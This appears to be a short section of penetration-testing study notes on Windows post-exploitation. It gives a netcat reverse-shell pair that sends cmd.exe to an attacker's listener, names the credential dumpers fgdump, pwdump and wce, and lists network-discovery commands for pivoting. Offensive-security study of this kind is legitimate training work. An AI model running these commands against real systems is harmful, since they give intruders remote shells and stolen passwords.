12.2 : Post Exploitation - Windows

Useful checklist: https://www.fuzzysecurity.com/tutorials/16.html

On Local

nc -lnvp 4444

On Target

nc -e cmd.exe  -nv $IP $PORT

Upload files to server

  • Password dumping

  • fgdump

  • pwdump

  • wce

Pivoting

netstat -ano

arp -a